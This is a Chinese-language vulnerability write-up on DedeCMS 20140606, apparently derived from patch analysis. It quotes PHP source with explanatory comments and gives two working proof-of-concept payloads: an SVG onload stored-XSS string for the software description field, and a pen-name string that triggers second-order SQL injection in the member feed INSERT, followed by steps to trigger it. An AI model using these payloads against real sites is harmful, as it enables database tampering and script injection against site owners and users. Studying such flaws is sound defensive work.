DedeCMS 20140606 二次注入 + 存储型 XSS

红色目录有exp,注入比较鸡肋
目录
dede/soft_edit.php, 存储型XSS漏洞        2
include /memberlogin.class.php 会员笔名二次注入        4
KibodWapon http://blog.163.com/cmdbat@126 从201406011补丁分析得来。

dede/soft_edit.php, 存储型XSS漏洞
[php]
<?php
/**
 * Software edit (admin-side edit form for a "soft" channel archive).
 *
 * Loads the archive row, the channel definition and the channel's additional
 * table row, builds the soft-link form fields and renders
 * templets/soft_edit.htm.  The stored-XSS point the page describes is in how
 * the software description is rendered, which happens in the template and is
 * not part of this excerpt.  What is visible here is that the stored soft-link
 * values are also written into HTML attributes without escaping (see $nForm).
 *
 * @version        $Id: soft_edit.php 1 16:09 2010年7月20日Z tianya $
 * @package        DedeCMS.Administrator
 * @copyright      Copyright (c) 2007 - 2010, DesDev, Inc.
 * @license        http://help.dedecms.com/usersguide/license.html
 * @link           http://www.dedecms.com
 */
require_once(dirname(__FILE__)."/config.php");
// Privilege gate for the admin edit rights; CheckPurview() itself is not shown here.
CheckPurview('a_Edit,a_AccEdit,a_MyEdit');
require_once(DEDEINC."/customfields.func.php");
require_once(DEDEADMIN."/inc/inc_archives_functions.php");
if(empty($dopost)) $dopost = '';
if($dopost!='save')
{
    require_once(DEDEADMIN."/inc/inc_catalog_options.php");
    require_once(DEDEINC."/dedetag.class.php");
    ClearMyAddon();
    // $aid is reduced to digits before it is interpolated into the queries below.
    $aid = preg_replace("#[^0-9]#", '', $aid);
    $channelid="3";
    // Read the archive record (joined with channel type and rank).
    $arcQuery = "SELECT #@__channeltype.typename as channelname, #@__arcrank.membername as rankname, #@__archives.* FROM #@__archives LEFT JOIN #@__channeltype ON #@__channeltype.id=#@__archives.channel LEFT JOIN #@__arcrank ON #@__arcrank.rank=#@__archives.arcrank WHERE #@__archives.id='$aid'";
    $dsql->SetQuery($arcQuery);
    $arcRow = $dsql->GetOne($arcQuery);
    if(!is_array($arcRow))
    {
        ShowMsg("读取档案基本信息出错!","-1");
        exit();
    }
    $query = "SELECT * FROM `#@__channeltype` WHERE id='".$arcRow['channel']."'";
    $cInfos = $dsql->GetOne($query);
    if(!is_array($cInfos))
    {
        ShowMsg("读取频道配置信息出错!","javascript:;");
        exit();
    }
    // The additional table name comes from the #@__channeltype row, not from the request.
    $addtable = $cInfos['addtable'];
    $addQuery = "SELECT * FROM `$addtable` WHERE aid='$aid'";
    $addRow = $dsql->GetOne($addQuery);
    $newRowStart = 1;
    $nForm = '';
    $daccess = $addRow['daccess'];
    $needmoney = $addRow['needmoney'];
    if($addRow['softlinks'] != '')
    {
        $dtp = new DedeTagParse();
        $dtp->LoadSource($addRow['softlinks']);
        if(is_array($dtp->CTags))
        {
            foreach($dtp->CTags as $ctag)
            {
                if($ctag->GetName()=='link')
                {
                    $islocal = $ctag->GetAtt('islocal');
                    if($islocal != 1) $needmsg = "<input type='checkbox' name='del{$newRowStart}' value='1' />删除";
                    else $needmsg = '<input name="sel1" type="button" id="sel1" value="选取" onClick="SelectSoft(\'form1.softurl'.$newRowStart.'\')" />';
                    // Stored link text, the "text" attribute and $islocal are concatenated into
                    // HTML attribute values with no htmlspecialchars() at this point (whether
                    // DedeTagParse escapes on parse is not visible here); escaping each value
                    // before concatenation is the defensive fix.
                    $nForm .= "<div style='line-height:36px'>软件地址{$newRowStart}:<input type='text' name='softurl{$newRowStart}' style='width:280px' value='".trim($ctag->GetInnerText())."' /> 服务器名称:<input type='text' name='servermsg{$newRowStart}' value='".$ctag->GetAtt("text")."' style='width:150px' /> <input type='hidden' name='islocal{$newRowStart}' value='{$islocal}' /> $needmsg </div>\r\n";
                    $newRowStart++;
                }
            }
        }
        $dtp->Clear();
    }
    $channelid = $arcRow['channel'];
    $tags = GetTags($aid);
    $arcRow= $arcRow;
    $addRow= $addRow;
    // Both rows are handed to the template as stored; any output escaping must happen in the template.
    include DedeInclude("templets/soft_edit.htm");
    exit();
}
[/php]
发布软件软件介绍处过滤不严 软件详情,点击源码编辑
[php]<svg / <g onload="javascript:alert(1)"></g></svg>[/php]1
include /memberlogin.class.php 会员笔名二次注入
注册用户笔名处注入 利用条件开启会员注册
[php]
/**
 * Normalises a member pen name before it is stored.
 *
 * Backticks and quotes are rewritten to typographic quotes, commas and
 * parentheses are substituted, and the result is passed through addslashes().
 * addslashes() only protects the statement that stores the value; the stored
 * row is later read back unescaped (see __construct() below) and interpolated
 * into a new INSERT by RecordFeeds(), so escaping is needed again at that point
 * of use (or a parameterised statement).  Whether the registration path calls
 * this function at all is not shown in this excerpt.
 */
function FormatUsername($username)
{
    $username = str_replace("`","‘",$username);
    $username = str_replace("'","‘",$username);
    $username = str_replace("\"","“",$username);
    $username = str_replace(",",",",$username);
    $username = str_replace("(","(",$username);
    $username = str_replace(")",")",$username);
    return addslashes($username);
}
// The pen name is copied from the member row exactly as stored.
$this->M_UserName = $this->fields['uname'];
[/php]
登陆函数
[php]
/**
 * Loads the current member from the DedeUserID cookie.
 *
 * @param int  $kptime cookie keep time in seconds; -1 selects 7 days
 * @param bool $cache  when TRUE, try the member cache before querying the DB
 */
function __construct($kptime = -1, $cache=FALSE)
{
    global $dsql;
    if($kptime==-1){
        $this->M_KeepTime = 3600 * 24 * 7;
    }else{
        $this->M_KeepTime = $kptime;
    }
    $formcache = FALSE;
    // Member id comes from a cookie; intval() below reduces it to an integer before it reaches the query.
    $this->M_ID = $this->GetNum(GetCookie("DedeUserID"));
    $this->M_LoginTime = GetCookie("DedeLoginTime");
    $this->fields = array();
    $this->isAdmin = FALSE;
    if(empty($this->M_ID))
    {
        $this->ResetUser();
    }else{
        $this->M_ID = intval($this->M_ID);
        if ($cache)
        {
            $this->fields = GetCache($this->memberCache, $this->M_ID);
            if( empty($this->fields) )
            {
                $this->fields = $dsql->GetOne("Select * From `#@__member` where mid='{$this->M_ID}' ");
            }
            else
            {
                $formcache = TRUE;
            }
        }
        else
        {
            $this->fields = $dsql->GetOne("Select * From `#@__member` where mid='{$this->M_ID}' ");
        }
        if(is_array($this->fields)){
            #api{{
            if(defined('UC_API') && @include_once DEDEROOT.'/uc_client/client.php')
            {
                if($data = uc_get_user($this->fields['userid']))
                {
                    if(uc_check_avatar($data[0]) && !strstr($this->fields['face'],UC_API))
                    {
                        $this->fields['face'] = UC_API.'/avatar.php?uid='.$data[0].'&size=middle';
                        $dsql->ExecuteNoneQuery("UPDATE `#@__member` SET `face`='".$this->fields['face']."' WHERE `mid`='{$this->M_ID}'");
                    }
                }
            }
            #/aip}}
            // Refresh the stored login time at most once per hour.
            if(time() - $this->M_LoginTime > 3600)
            {
                $dsql->ExecuteNoneQuery("update `#@__member` set logintime='".time()."',loginip='".GetIP()."' where mid='".$this->fields['mid']."';");
                PutCookie("DedeLoginTime",time(),$this->M_KeepTime);
            }
            $this->M_LoginID = $this->fields['userid'];
            $this->M_MbType = $this->fields['mtype'];
            $this->M_Money = $this->fields['money'];
            // uname is taken from the row as stored; nothing re-escapes it here, and
            // RecordFeeds() interpolates $this->M_UserName directly into an INSERT.
            $this->M_UserName = $this->fields['uname'];
            $this->M_Scores = $this->fields['scores'];
            $this->M_Face = $this->fields['face'];
            $this->M_Rank = $this->fields['rank'];
            $this->M_Spacesta = $this->fields['spacesta'];
            // scores is interpolated unquoted from the member row.
            $sql = "Select titles From #@__scores where integral<={$this->fields['scores']} order by integral desc";
            $scrow = $dsql->GetOne($sql);
            $this->fields['honor'] = $scrow['titles'];
            $this->M_Honor = $this->fields['honor'];
            if($this->fields['matt']==10) $this->isAdmin = TRUE;
            $this->M_UpTime = $this->fields['uptime'];
            $this->M_ExpTime = $this->fields['exptime'];
            $this->M_JoinTime = MyDate('Y-m-d',$this->fields['jointime']);
            if($this->M_Rank>10 && $this->M_UpTime>0){
                $this->M_HasDay = $this->Judgemember();
            }
            if( !$formcache )
            {
                SetCache($this->memberCache, $this->M_ID, $this->fields, 1800);
            }
        }else{
            $this->ResetUser();
        }
    }
}
[/php]
登陆后
[php]
/**
 * Records a member activity entry in the member feed table.
 *
 * @access    public
 * @param     string  $type   record type; only the listed types are stored
 * @param     string  $title  record title
 * @param     string  $note   record description
 * @param     string  $aid    id of the content involved
 * @return    mixed   result of ExecuteNoneQuery(), or FALSE when $type is not recorded
 */
造成注入 会员动态表,
function RecordFeeds($type, $title, $note, $aid)
{
    global $dsql,$cfg_mb_feedcheck;
    // Decide whether this action type is recorded at all.  Note the non-strict
    // in_array(): under pre-PHP 8 loose comparison a non-string $type could match.
    if (in_array($type,array('add','addsoft','feedback','addfriends','stow'))){
        $ntime = time();
        $title = htmlspecialchars(cn_substrR($title,255));
        if(in_array($type,array('add','addsoft','feedback','stow')))
        {
            $rcdtype = array('add'=>' 成功发布了', 'addsoft'=>' 成功发布了软件', 'feedback'=>' 评论了文章','stow'=>' 收藏了');
            // Content-publish handling.
            $arcrul = " <a href='/plus/view.php?aid=".$aid."'>".$title."</a>";
            $title = htmlspecialchars($rcdtype[$type].$arcrul, ENT_QUOTES);
        }
        else if ($type == 'addfriends')
        {
            // Add-friend handling.
            $arcrul = " <a href='/member/index.php?uid=".$aid."'>".$aid."</a>";
            $title = htmlspecialchars(' 与'. $arcrul."成为好友", ENT_QUOTES);
        }
        // $note only goes through Html2Text(); whether that SQL-escapes is not visible here.
        $note = Html2Text($note);
        // Normalised only now; $aid was already concatenated into $arcrul/$title above
        // (those are entity-encoded), so this line protects only the `aid` column.
        $aid = (isset($aid) && is_numeric($aid) ? $aid : 0);
        $ischeck = ($cfg_mb_feedcheck == 'Y')? 0 : 1;
        // $this->M_UserName (the stored pen name loaded in __construct()) is interpolated
        // with no escaping; the SQL comment inside the string marks the spot.  The fix is to
        // escape at this point of use or build the statement with bound parameters.
        $query = "INSERT INTO `#@__member_feed` (`mid`, `userid`, `uname`, `type`, `aid`, `dtime`,`title`, `note`, `ischeck`) Values('$this->M_ID', '$this->M_LoginID', '$this->M_UserName'/*二次注入到这里*/, '$type', '$aid', '$ntime', '$title', '$note', '$ischeck'); ";
        $rs = $dsql->ExecuteNoneQuery($query);
        return $rs;
    }
    else
    {
        return FALSE;
    }
}
[/php]
用户笔名长度:
[php]
// strlen() counts bytes, not characters, so the caps are byte lengths.
if(strlen($userid) > 20 || strlen($uname) > 36)
{
    ShowMsg('你的用户名或用户笔名过长,不允许注册!', '-1');
    exit();
}
[/php]
注册用户笔名 exp: ',1,3,1,1,VERsion(),1),(1,1,'1
发表文章,任意 进入会员中心,点击我的动态 2
